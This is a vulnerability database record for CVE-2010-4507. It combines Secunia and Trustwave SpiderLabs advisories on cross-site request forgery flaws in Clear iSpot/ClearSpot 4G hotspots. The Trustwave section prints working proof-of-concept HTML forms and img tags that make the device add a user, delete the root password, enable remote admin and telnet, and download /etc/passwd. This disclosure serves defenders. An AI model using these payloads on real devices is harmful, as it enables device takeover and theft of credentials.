ID

VAR-201012-0295

CVE

CVE-2010-4507

TITLE

ClearSpot of iSpot Cross-site request forgery vulnerability in administrator authentication

DESCRIPTION

Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. The following versions are affected: iSpot 2.0.0.0 (R1679) Clearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786). ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Clear iSpot and Clear Clearspot Cross-Site Request Forgery Vulnerability SECUNIA ADVISORY ID: SA42590 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42590/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42590 RELEASE DATE: 2010-12-26 DISCUSS ADVISORY: http://secunia.com/advisories/42590/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42590/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42590 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Clear iSpot and Clear Clearspot, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. remove the root password or enable telnet by tricking a logged-in administrator into visiting a malicious web site. The vulnerabilities are reported in Clear iSpot version 2.0.0.0, firmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0, firmware version 1.9.9.4. SOLUTION: Do not browse untrusted web sites or follow untrusted links while being logged-in to the application. PROVIDED AND/OR DISCOVERED BY: Matthew Jakubowski, Trustwave's SpiderLabs ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt Published: 2010-12-10 Version: 1.0 Vendor: Clear (http://www.clear.com <http://www.clear.com/>) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions. iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name : IMW-C615W Device Manufacturer : INFOMARK (http://infomark.co.kr <http://infomark.co.kr/>) Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection. Credit: Matthew Jakubowski of Trustwave's SpiderLabs CVE: CVE-2010-4507 Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information. Add new user: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="adduser -S jaku"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser% 20-S%20jaku'> Remove root password: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="passwd -d root"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%2 0-d%20root'> Enable remote administration access: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="enable_remote_access" value="YES"> <input type="hidden" name="remote_access_port" value="80"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remo te_access=YES&remote_access_port=80'> Enable telnet if not already enabled: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_set_wimax_etc_config"> <input type="hidden" name="ENABLE_TELNET" value="YES"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&EN ABLE_TELNET=YES'> Allow remote telnet access: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="add_enable" value="YES"> <input type="hidden" name="add_host_ip" value="1"> <input type="hidden" name="add_port" value="23"> <input type="hidden" name="add_protocol" value="BOTH"> <input type="hidden" name="add_memo" value="admintelnet"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable= YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'> Once compromised, it is possible to download any file from the devices using the following method. Download /etc/passwd file: <form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi <http://192.168.1.1/cgi-bin/upgrademain.cgi> "> <input type="hidden" name="act" value="act_file_download"> <input type="hidden" name="METHOD" value="PATH"> <input type="hidden" name="FILE_PATH" value="/etc/passwd"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHO D=PATH&FILE_PATH=/etc/passwd'> Vendor Response: No official response is available at the time of release. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published. Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com <https://www.trustwave.com/> About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

cross-site request forgery

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Matthew Jakubowski

SOURCES

LAST UPDATE DATE

2025-04-11T23:19:04.480000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE